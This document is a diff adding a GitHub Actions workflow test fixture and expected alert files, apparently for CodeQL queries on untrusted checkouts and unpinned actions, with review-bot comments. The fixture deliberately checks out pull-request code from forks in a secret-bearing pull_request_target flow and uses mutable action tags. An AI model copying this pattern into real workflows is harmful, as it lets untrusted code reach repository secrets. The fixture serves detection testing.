+ github_workflow: $ {{ github.workflow }}
+ github_event_pull_request_head_sha: ${{ github.event.pull_request.head.sha }}
+ flow: ${{( github.event_name == 'push' && 'push' ) || ( github.event_name == 'merge_group' && 'merge_queue_check' ) || ( github.event_name == 'pull_request_target' && github.event.pull_request.head.repo.id != 383289760 && 'pr_from_fork' ) || ( github.event_name == 'pull_request' && github.event.pull_request.head.repo.id == 383289760 && 'pr_from_branch' )}}
+ sha_to_check: ${{ github.event.pull_request.head.sha || github.sha }}
+
+ secrets:
+ CACHIX_AUTH_TOKEN: ${{ secrets.CACHIX_AUTH_TOKEN }}
+ DOCKER_HUB_USERNAME: ${{ secrets.DOCKER_HUB_USERNAME }}
+ DOCKER_HUB_ACCESS_TOKEN: ${{ secrets.DOCKER_HUB_ACCESS_TOKEN }}
+ PABLO_PROJ_JSON: ${{ secrets.PABLO_PROJ_JSON }}
+ VERCEL_TOKEN: ${{ secrets.VERCEL_TOKEN }}
+ CANCEL_GITHUB_TOKEN: ${{ github.token }}
+ NIXBUILD_TOKEN: ${{ secrets.NIXBUILD_TOKEN }}
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow.yml
new file mode 100644
index 000000000000..061ff7d02c5e
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow.yml
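Review bot: The `github_workflow: $ {{ github.workflow }}` line in this caller is not an expression — the space after `$` means it is passed to the reusable workflow as the literal string `$ {{ github.workflow }}`, which the callee then uses as the prefix of every `concurrency.group`. If this was copied verbatim from the upstream workflow it is a useful real-world fixture, but a comment such as `# kept as found upstream: '$ {{' is a literal, not an expression` would stop a later cleanup from "fixing" it and shifting the line numbers baked into the .expected files. The same applies to the doubled closing quotes in the callee's `echo "${{ inputs.github_event_name }}""` and `echo "${{ inputs.flow }}""` lines in pr-workflow.yml.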
@@ -0,0 +1,463 @@
+name: "pr-workflow"
+concurrency:
+ group: ${{ github.workflow }}-pr-workflow-${{ github.event.pull_request.number || github.ref }}
+ cancel-in-progress: true
+on:
+ workflow_call:
+ inputs:
+ github_event_name:
+ required: true
+ type: string
+ github_event_pull_request_head_repo_id:
+ required: true
+ type: number
+ github_workflow:
+ required: true
+ type: string
+ github_event_pull_request_head_sha:
+ required: true
+ type: string
+ flow:
+ required: true
+ type: string
+ sha_to_check:
+ required: true
+ type: string
+ secrets:
+ NIXBUILD_TOKEN:
+ required: true
+ CACHIX_AUTH_TOKEN:
+ required: true
+ DOCKER_HUB_USERNAME:
+ required: true
+ DOCKER_HUB_ACCESS_TOKEN:
+ required: true
+ PABLO_PROJ_JSON:
+ required: true
+ VERCEL_TOKEN:
+ required: true
+ CANCEL_GITHUB_TOKEN:
+ required: true
+
+permissions:
+ pull-requests: write
+
+jobs:
+ dependency-review:
+ outputs:
+ ok: ${{ steps.ok.outputs.ok }}
+ concurrency:
+ group: ${{ inputs.github_workflow }}-dependency-review-${{ github.event.pull_request.number || github.ref }}
+ cancel-in-progress: true
+ needs:
+ - privilege-check
+ runs-on:
+ - ubuntu-latest
+ steps:
+ - name: checkout
+ uses: actions/checkout@v3
+ if: ${{ inputs.github_event_name != 'merge_group' && inputs.github_event_name != 'push' }}
+ - uses: amannn/action-semantic-pull-request@v5
+ if: ${{ inputs.github_event_name != 'merge_group' && inputs.github_event_name != 'push' }}
+ with:
+ requireScope: false
+ subjectPattern: (.*[a-zA-Z].*){16,}
+ subjectPatternError: |
+ https://regexper.com/#%28.*%5Ba-zA-Z%5D.*%29%7B16%2C%7D
+ env:
+ GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+
+ - name: dependency-review
+ if: ${{ inputs.github_event_name != 'merge_group' && inputs.github_event_name != 'push' }}
+ uses: actions/dependency-review-action@v3
+ with:
+ # GHSA-pfrx-2q88-qq97, GHSA-w5p7-h5w8-2hfq, GHSA-wcg3-cvx6-7396 are ignored because they are casued by the static Docusaurus build. Please remove when Docusaurus gets updated.
+ # GHSA-969w-q74q-9j8v, GHSA-44mr-8vmm-wjhg, GHSA-wh6w-3828-g9qf are ignored because they are transitive dependencies still used by the master branch of Substrate. Please remove when Substrate update the according dependencies.
+ # GHSA-fjx5-qpf4-xjf2 is ignored because it is a transitive dependencies still used by the master branch of ibc-proto-rs. Please remove when ibc-rs-proto updates it.
+ allow-ghsas: GHSA-pfrx-2q88-qq97, GHSA-w5p7-h5w8-2hfq, GHSA-wcg3-cvx6-7396, GHSA-969w-q74q-9j8v, GHSA-44mr-8vmm-wjhg, GHSA-wh6w-3828-g9qf, GHSA-ff4p-7xrq-q5r8, GHSA-xm67-587q-r2vw, GHSA-fjx5-qpf4-xjf2
+ - id: ok
+ run: echo "ok=true" >> "$GITHUB_OUTPUT"
+
+ privilege-check:
+ name: "privilege-check"
+ if: ${{ inputs.flow == 'push' || inputs.github_event_name == 'merge_group' || (inputs.github_event_name == 'pull_request_target' && inputs.github_event_pull_request_head_repo_id != 383289760) || (inputs.github_event_name == 'pull_request' && inputs.github_event_pull_request_head_repo_id == 383289760) }}
+ continue-on-error: false
+ runs-on: ubuntu-latest
+ steps:
+ - run: |
+ echo "${{ inputs.github_event_name }}""
+ echo "${{ inputs.flow }}""
+ echo "${{ github.ref_name }}"
+ echo "${{ inputs.github_event_pull_request_head_repo_id }}"
+
+ lfs-check:
+ name: lfs-check
+ needs:
+ - privilege-check
+ continue-on-error: false
+ runs-on: ubuntu-latest
+ concurrency:
+ group: ${{ inputs.github_workflow }}-lfs-check-${{ github.event.pull_request.number || github.ref }}
+ cancel-in-progress: true
+ steps:
+ - uses: actions/checkout@v3
+ with:
+ ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }}
+ persist-credentials: false
+ submodules: false
+ lfs: true
+ - uses: actionsdesk/lfs-warning@v3.2
+ name: lfs-warning
+ with:
+ labelName: lfs-detected!
+ filesizelimit: 20KB
+ exclusionPatterns: |
+ **/*.rs
+ **/*.ts
+ **/*.md
+ **/*.json
+ **/*.lock
+ **/*.nix
+ **/*.sol
+ **/*.toml
+ flake/eth-pos-devnet
+ - run: echo ${{ steps.lfs-warning.outputs.lfsFiles }}
+
+ nix-flake-check:
+ name: "nix-flake-check"
+ outputs:
+ ok: ${{ steps.ok.outputs.ok }}
+ needs:
+ - privilege-check
+ runs-on:
+ - ubuntu-latest-m
+ continue-on-error: false
+ concurrency:
+ group: ${{ inputs.github_workflow }}-nix-flake-check-${{ github.event.pull_request.number || github.ref }}
+ cancel-in-progress: true
+ steps:
+ - uses: actions/checkout@v3
+ with:
+ lfs: true
+ ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }}
+ persist-credentials: false
+ - uses: cachix/install-nix-action@v20
+ with:
+ nix_path: nixpkgs=channel:nixos-unstable
+ - uses: DeterminateSystems/magic-nix-cache-action@main
+ - uses: cachix/cachix-action@master
+ with:
+ authToken: "${{ secrets.CACHIX_AUTH_TOKEN }}"
+ name: composable
+ skipAddingSubstituter: false
+ skipPush: false
+ - run: |
+ nix --version
+ nix show-config
+ nix run .#nix-flake-check --accept-flake-config
+ - id: ok
+ run: echo "ok=true" >> "$GITHUB_OUTPUT"
+
+
+ # build-all-outputs-packages-arm:
+ # outputs:
+ # ok: ${{ steps.ok.outputs.ok }}
+ # name: build-all-outputs-packages-arm
+ # needs:
+ # - privilege-check
+ # runs-on:
+ # - aarch64-linux-80C-128GB-2048GB
+ # concurrency:
+ # group: ${{ inputs.github_workflow }}-build-all-outputs-packages-arm-${{ github.event.pull_request.number || github.ref }}
+ # cancel-in-progress: true
+ # steps:
+ # - name: Set up Cachix
+ # if: ${{ inputs.flow == 'push' }}
+ # uses: cachix/cachix-action@586bf280495080c5a6d4868237ad28a860e4b309
+ # with:
+ # authToken: "${{ secrets.CACHIX_AUTH_TOKEN }}"
+ # name: composable
+ # installCommand: "true"
+ # - uses: actions/checkout@v3
+ # if: ${{ inputs.flow == 'push' }}
+ # with:
+ # lfs: true
+ # ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }}
+ # persist-credentials: false
+ # - name: Build all packages
+ # if: ${{ inputs.flow == 'push' }}
+ # uses: "./.github/templates/watch-exec"
+ # with:
+ # command: nix -- build .#all-outputs
+ # - id: ok
+ # run: echo "ok=true" >> "$GITHUB_OUTPUT"
+
+
+ build-all-outputs-packages:
+ outputs:
+ ok: ${{ steps.ok.outputs.ok }}
+ name: build-all-outputs-packages
+ needs:
+ - privilege-check
+ - build-all-deps-packages
+ runs-on:
+ - x86_64-linux-32C-128GB-2TB
+ concurrency:
+ group: ${{ inputs.github_workflow }}-build-all-outputs-packages-${{ github.event.pull_request.number || github.ref }}
+ cancel-in-progress: true
+ steps:
+ - name: Set up Cachix
+ if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' }}
+ uses: cachix/cachix-action@586bf280495080c5a6d4868237ad28a860e4b309
+ with:
+ authToken: "${{ secrets.CACHIX_AUTH_TOKEN }}"
+ name: composable
+ installCommand: "true"
+ - uses: actions/checkout@v3
+ if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' }}
+ with:
+ lfs: true
+ ref: ${{ inputs.github_event_pull_request_head_sha }}
+ persist-credentials: false
+ - name: Build all packages
+ if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' }}
+ uses: "./.github/templates/watch-exec"
+ with:
+ command: nix -- build .#all-outputs
+ - id: ok
+ run: echo "ok=true" >> "$GITHUB_OUTPUT"
+
+ build-all-checks-packages:
+ outputs:
+ ok: ${{ steps.ok.outputs.ok }}
+ name: build-all-checks-packages
+ needs:
+ - privilege-check
+ - build-all-outputs-packages
+ runs-on:
+ - x86_64-linux-32C-128GB-2TB
+ concurrency:
+ group: ${{ inputs.github_workflow }}-build-all-checks-packages-${{ github.event.pull_request.number || github.ref }}
+ cancel-in-progress: true
+ steps:
+ - name: Set up Cachix
+ if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' }}
+ uses: cachix/cachix-action@586bf280495080c5a6d4868237ad28a860e4b309
+ with:
+ authToken: "${{ secrets.CACHIX_AUTH_TOKEN }}"
+ name: composable
+ installCommand: "true"
+ - uses: actions/checkout@v3
+ if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' }}
+ with:
+ lfs: true
+ ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }}
+ persist-credentials: false
+ - name: Build all packages
+ if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' }}
+ uses: "./.github/templates/watch-exec"
+ with:
+ command: nix -- build .#all-checks
+ - id: ok
+ run: echo "ok=true" >> "$GITHUB_OUTPUT"
+
+
+ build-all-deps-packages:
+ name: build-all-deps-packages
+ outputs:
+ ok: ${{ steps.ok.outputs.ok }}
+ needs:
+ - privilege-check
+ runs-on:
+ - x86_64-linux-32C-128GB-2TB
+ concurrency:
+ group: ${{ inputs.github_workflow }}-build-all-deps-packages-${{ matrix.runner }}-${{ github.event.pull_request.number || github.ref }}
+ cancel-in-progress: true
+ steps:
+ - name: Set up Cachix
+ if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' || inputs.flow == 'pr_from_fork' }}
+ uses: cachix/cachix-action@586bf280495080c5a6d4868237ad28a860e4b309
+ with:
+ authToken: "${{ secrets.CACHIX_AUTH_TOKEN }}"
+ name: composable
+ installCommand: "true"
+ - uses: actions/checkout@v3
+ if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' || inputs.flow == 'pr_from_fork' }}
+ with:
+ lfs: true
+ ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }}
+ persist-credentials: false
+ - name: build-all-deps-packages
+ if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' || inputs.flow == 'pr_from_fork' }}
+ uses: "./.github/templates/watch-exec"
+ with:
+ command: nix -- build .#all-deps
+ - id: ok
+ run: echo "ok=true" >> "$GITHUB_OUTPUT"
+
+ draft-release-check:
+ name: "draft-release-check"
+ if: ${{ failure() || cancelled() || success() }}
+ continue-on-error: false
+ runs-on: ubuntu-latest
+ needs:
+ - build-all-checks-packages
+ - dependency-review
+ - nix-flake-check
+ - mantis-e2e
+ steps:
+ - run: |
+ echo "nix-flake-check" ${{ needs.nix-flake-check.outputs.ok }}
+ echo "dependency-review" ${{ needs.dependency-review.outputs.ok }}
+ echo "build-all-checks-packages" ${{ needs.build-all-checks-packages.outputs.ok }}
+ echo "mantis-e2e" ${{ needs.mantis-e2e.outputs.ok }}
+ - if: ${{ needs.nix-flake-check.outputs.ok == 'true' && needs.dependency-review.outputs.ok == 'true' && needs.build-all-checks-packages.outputs.ok == 'true' && needs.mantis-e2e.outputs.ok == 'true' }}
+ run: |
+ echo "All dependencies built well"
+ exit 0
+ - if: ${{ !(needs.nix-flake-check.outputs.ok == 'true' && needs.dependency-review.outputs.ok == 'true' && needs.build-all-checks-packages.outputs.ok == 'true' && needs.mantis-e2e.outputs.ok == 'true' ) }}
+ run: |
+ echo "Some of dependencies (see jobs graph, needs attributes, and output of this job) failed"
+ exit 42
+
+ draft-release-artifacts:
+ name: "draft-release-artifacts"
+ runs-on:
+ - x86_64-linux-32C-128GB-2TB
+ needs:
+ - draft-release-check
+ if: ${{ inputs.github_event_name == 'push' }}
+ permissions:
+ pull-requests: write
+ contents: write
+ concurrency:
+ group: ${{ inputs.github_workflow }}-draft-release-artifacts-${{ github.ref }}
+ cancel-in-progress: true
+ steps:
+ - name: Set up Cachix
+ uses: cachix/cachix-action@586bf280495080c5a6d4868237ad28a860e4b309
+ with:
+ authToken: "${{ secrets.CACHIX_AUTH_TOKEN }}"
+ name: composable
+ installCommand: "true"
+ - uses: actions/checkout@v3
+ with:
+ fetch-depth: 0
+ - name: Login to DockerHub
+ uses: docker/login-action@v2
+ with:
+ username: ${{ secrets.DOCKER_HUB_USERNAME }}
+ password: ${{ secrets.DOCKER_HUB_ACCESS_TOKEN }}
+ - name: Download artifacts
+ run: |
+ nix run .#generate-release-artifacts --print-build-logs
+
+ - name: Release artifacts
+ uses: softprops/action-gh-release@v1
+ with:
+ draft: true
+ prerelease: false
+ fail_on_unmatched_files: true
+ generate_release_notes: true
+ body_path: release-artifacts/release.txt
+ name: ${{ github.ref_name }}
+ tag_name: ${{ github.ref_name }}
+ target_commitish: ${{ github.sha }}
+ files: |
+ release-artifacts/to-upload/*
+
+ push-docker-images:
+ name: push-docker-images
+ if: ${{ inputs.flow == 'push' }}
+ needs:
+ - draft-release-check
+ runs-on:
+ - x86_64-linux-32C-128GB-2TB
+ concurrency:
+ group: ${{inputs.flow}}-${{ inputs.github_workflow }}-push-docker-images-${{ github.event.pull_request.number || github.ref }}
+ cancel-in-progress: false
+ steps:
+ - name: Set up Cachix
+ uses: cachix/cachix-action@586bf280495080c5a6d4868237ad28a860e4b309
+ with:
+ authToken: "${{ secrets.CACHIX_AUTH_TOKEN }}"
+ name: composable
+ installCommand: "true"
+ - uses: actions/checkout@v3
+ with:
+ lfs: true
+ ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }}
+ persist-credentials: false
+ - name: Build all packages
+ uses: "./.github/templates/watch-exec"
+ with:
+ command: nix -- build .#all
+ - name: Publish cmc-api to docker hub
+ uses: "./.github/templates/docker-publish"
+ with:
+ image_path: result/docker-image-cmc-api.tar.gz
+ username: ${{ secrets.DOCKER_HUB_USERNAME }}
+ password: ${{ secrets.DOCKER_HUB_ACCESS_TOKEN }}
+ name: cmc-api
+ artifact: cmc-api:latest
+
+ - name: Publish devnet-xc to docker hub
+ uses: "./.github/templates/docker-publish"
+ with:
+ image_path: result/docker-image-devnet-xc.tar.gz
+ username: ${{ secrets.DOCKER_HUB_USERNAME }}
+ password: ${{ secrets.DOCKER_HUB_ACCESS_TOKEN }}
+ name: devnet-xc
+ artifact: devnet-xc:latest
+ tag: ${{ inputs.github_event_name == 'push' && 'main' || ''}}
+
+ - name: Publish hyperspace-composable-rococo-picasso-rococo to docker hub
+ uses: "./.github/templates/docker-publish"
+ with:
+ image_path: result/hyperspace-composable-rococo-picasso-rococo.tar.gz
+ username: ${{ secrets.DOCKER_HUB_USERNAME }}
+ password: ${{ secrets.DOCKER_HUB_ACCESS_TOKEN }}
+ name: hyperspace-composable-rococo-picasso-rococo
+ artifact: hyperspace-composable-rococo-picasso-rococo:latest
+
+ - name: Publish hyperspace-composable-polkadot-picasso-kusama to docker hub
+ uses: "./.github/templates/docker-publish"
+ with:
+ image_path: result/hyperspace-composable-polkadot-picasso-kusama.tar.gz
+ username: ${{ secrets.DOCKER_HUB_USERNAME }}
+ password: ${{ secrets.DOCKER_HUB_ACCESS_TOKEN }}
+ name: hyperspace-composable-polkadot-picasso-kusama
+ artifact: hyperspace-composable-polkadot-picasso-kusama:latest
+
+ mantis-e2e:
+ name: mantis-e2e
+ outputs:
+ ok: ${{ steps.ok.outputs.ok }}
+ needs:
+ - build-all-checks-packages
+ runs-on:
+ - ubuntu-latest-m
+ concurrency:
+ group: ${{ inputs.github_workflow }}-mantis-e2e-${{ github.event.pull_request.number || github.ref }}
+ cancel-in-progress: true
+ steps:
+ - uses: actions/checkout@v3
+ with:
+ lfs: true
+ ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }}
+ persist-credentials: false
+ - uses: cachix/install-nix-action@v20
+ with:
+ nix_path: nixpkgs=channel:nixos-unstable
+ - uses: DeterminateSystems/magic-nix-cache-action@main
+ - uses: cachix/cachix-action@master
+ with:
+ authToken: "${{ secrets.CACHIX_AUTH_TOKEN }}"
+ name: composable
+ skipAddingSubstituter: false
+ skipPush: false
+ - name: Devnet integration tests
+ run: |
+ nix run .#mantis-e2e --accept-flake-config --impure
+ - id: ok
+ run: echo "ok=true" >> "$GITHUB_OUTPUT"
diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected
index 665e9626b247..c91470d5cc84 100644
--- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected
+++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected
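Review bot: The UntrustedCheckoutCritical.expected change records a single alert for this fixture — the `Build all packages` step of `build-all-outputs-packages`, whose preceding checkout uses `ref: ${{ inputs.github_event_pull_request_head_sha }}` — while the sibling jobs that check out `ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }}` and then run `nix -- build` on the result (including `build-all-deps-packages`, which is explicitly enabled for `inputs.flow == 'pr_from_fork'`) are not reported. If the `|| github.sha` fallback is what keeps those checkouts out of the results, that looks like a detection gap worth a follow-up, since the left-hand operand still resolves to the forwarded PR head sha whenever it is set and the caller in pr-workflow-fork.yaml triggers on `pull_request_target` and forwards `secrets.CACHIX_AUTH_TOKEN` into these jobs. The query change itself is not in this chunk, so this may already be intentional; either way a fixture comment next to the first `|| github.sha` checkout, such as `# fallback form: currently not reported by UntrustedCheckoutCritical`, would document the expected behaviour for whoever regenerates the .expected files.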
@@ -16,5 +16,15 @@ | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Unpinned 3rd party Action 'Poutine Level 0' step $@ uses 'rlespinasse/github-slug-action' with ref 'v4', not a pinned commit hash | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Uses Step | | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Unpinned 3rd party Action 'Test' step $@ uses 'ruby/setup-ruby' with ref 'v1', not a pinned commit hash | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:60:9:70:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'amannn/action-semantic-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/pr-workflow.yml:60:9:70:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:109:9:124:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'actionsdesk/lfs-warning' with ref 'v3.2', not a pinned commit hash | .github/workflows/pr-workflow.yml:109:9:124:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:144:9:147:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/install-nix-action' with ref 'v20', not a pinned commit hash | .github/workflows/pr-workflow.yml:144:9:147:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:147:9:148:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'determinatesystems/magic-nix-cache-action' with ref 'main', not a pinned commit hash | .github/workflows/pr-workflow.yml:147:9:148:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:148:9:154:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/cachix-action' with ref 'master', 
not a pinned commit hash | .github/workflows/pr-workflow.yml:148:9:154:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:346:9:351:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'docker/login-action' with ref 'v2', not a pinned commit hash | .github/workflows/pr-workflow.yml:346:9:351:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:355:9:369:2 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'softprops/action-gh-release' with ref 'v1', not a pinned commit hash | .github/workflows/pr-workflow.yml:355:9:369:2 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:449:9:452:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/install-nix-action' with ref 'v20', not a pinned commit hash | .github/workflows/pr-workflow.yml:449:9:452:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:452:9:453:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'determinatesystems/magic-nix-cache-action' with ref 'main', not a pinned commit hash | .github/workflows/pr-workflow.yml:452:9:453:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:453:9:459:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/cachix-action' with ref 'master', not a pinned commit hash | .github/workflows/pr-workflow.yml:453:9:459:6 | Uses Step | Uses Step | | .github/workflows/test7.yml:24:9:27:6 | Uses Step | Unpinned 3rd party Action 'Benchmark' step $@ uses 'pnpm/action-setup' with ref 'v3', not a pinned commit hash | .github/workflows/test7.yml:24:9:27:6 | Uses Step | Uses Step | | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref 'v1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | 
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 8707849328b8..711a529b179c 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
@@ -109,6 +109,42 @@ edges | .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:36:9:38:6 | Uses Step | | .github/workflows/poc.yml:36:9:38:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | | .github/workflows/poc.yml:38:9:43:6 | Uses Step | .github/workflows/poc.yml:43:9:47:2 | Uses Step | +| .github/workflows/pr-workflow.yml:57:9:60:6 | Uses Step | .github/workflows/pr-workflow.yml:60:9:70:6 | Uses Step | +| .github/workflows/pr-workflow.yml:60:9:70:6 | Uses Step | .github/workflows/pr-workflow.yml:70:9:78:6 | Uses Step | +| .github/workflows/pr-workflow.yml:70:9:78:6 | Uses Step | .github/workflows/pr-workflow.yml:78:9:81:2 | Run Step: ok | +| .github/workflows/pr-workflow.yml:103:9:109:6 | Uses Step | .github/workflows/pr-workflow.yml:109:9:124:6 | Uses Step | +| .github/workflows/pr-workflow.yml:109:9:124:6 | Uses Step | .github/workflows/pr-workflow.yml:124:9:126:2 | Run Step | +| .github/workflows/pr-workflow.yml:139:9:144:6 | Uses Step | .github/workflows/pr-workflow.yml:144:9:147:6 | Uses Step | +| .github/workflows/pr-workflow.yml:144:9:147:6 | Uses Step | .github/workflows/pr-workflow.yml:147:9:148:6 | Uses Step | +| .github/workflows/pr-workflow.yml:147:9:148:6 | Uses Step | .github/workflows/pr-workflow.yml:148:9:154:6 | Uses Step | +| .github/workflows/pr-workflow.yml:148:9:154:6 | Uses Step | .github/workflows/pr-workflow.yml:154:9:158:6 | Run Step | +| .github/workflows/pr-workflow.yml:154:9:158:6 | Run Step | .github/workflows/pr-workflow.yml:158:9:196:2 | Run Step: ok | +| .github/workflows/pr-workflow.yml:209:9:216:6 | Uses Step | .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | +| .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | +| .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | .github/workflows/pr-workflow.yml:227:9:230:2 | Run Step: ok | +| .github/workflows/pr-workflow.yml:243:9:250:6 | Uses Step | 
.github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | +| .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | +| .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | .github/workflows/pr-workflow.yml:261:9:265:2 | Run Step: ok | +| .github/workflows/pr-workflow.yml:277:9:284:6 | Uses Step | .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | +| .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | +| .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | .github/workflows/pr-workflow.yml:295:9:298:2 | Run Step: ok | +| .github/workflows/pr-workflow.yml:309:9:314:6 | Run Step | .github/workflows/pr-workflow.yml:314:9:318:6 | Run Step | +| .github/workflows/pr-workflow.yml:314:9:318:6 | Run Step | .github/workflows/pr-workflow.yml:318:9:323:2 | Run Step | +| .github/workflows/pr-workflow.yml:337:9:343:6 | Uses Step | .github/workflows/pr-workflow.yml:343:9:346:6 | Uses Step | +| .github/workflows/pr-workflow.yml:343:9:346:6 | Uses Step | .github/workflows/pr-workflow.yml:346:9:351:6 | Uses Step | +| .github/workflows/pr-workflow.yml:346:9:351:6 | Uses Step | .github/workflows/pr-workflow.yml:351:9:355:6 | Run Step | +| .github/workflows/pr-workflow.yml:351:9:355:6 | Run Step | .github/workflows/pr-workflow.yml:355:9:369:2 | Uses Step | +| .github/workflows/pr-workflow.yml:380:9:386:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | +| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | +| .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | +| .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | +| .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | 
.github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | +| .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | +| .github/workflows/pr-workflow.yml:444:9:449:6 | Uses Step | .github/workflows/pr-workflow.yml:449:9:452:6 | Uses Step | +| .github/workflows/pr-workflow.yml:449:9:452:6 | Uses Step | .github/workflows/pr-workflow.yml:452:9:453:6 | Uses Step | +| .github/workflows/pr-workflow.yml:452:9:453:6 | Uses Step | .github/workflows/pr-workflow.yml:453:9:459:6 | Uses Step | +| .github/workflows/pr-workflow.yml:453:9:459:6 | Uses Step | .github/workflows/pr-workflow.yml:459:9:462:6 | Run Step | +| .github/workflows/pr-workflow.yml:459:9:462:6 | Run Step | .github/workflows/pr-workflow.yml:462:9:463:48 | Run Step: ok | | .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | .github/workflows/priv_pull_request_checkout.yml:20:9:23:52 | Run Step | | .github/workflows/test1.yml:18:9:21:6 | Uses Step | .github/workflows/test1.yml:21:9:24:6 | Run Step | | .github/workflows/test1.yml:21:9:24:6 | Run Step | .github/workflows/test1.yml:24:9:25:39 | Run Step | 
@@ -170,6 +206,7 @@ edges | .github/workflows/mend.yml:29:9:33:28 | Uses Step | .github/workflows/mend.yml:22:9:29:6 | Uses Step | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/poc2.yml:52:9:58:24 | Run Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test5.yml:32:9:34:2 | Run Step | .github/workflows/test5.yml:28:9:32:6 | Uses Step | 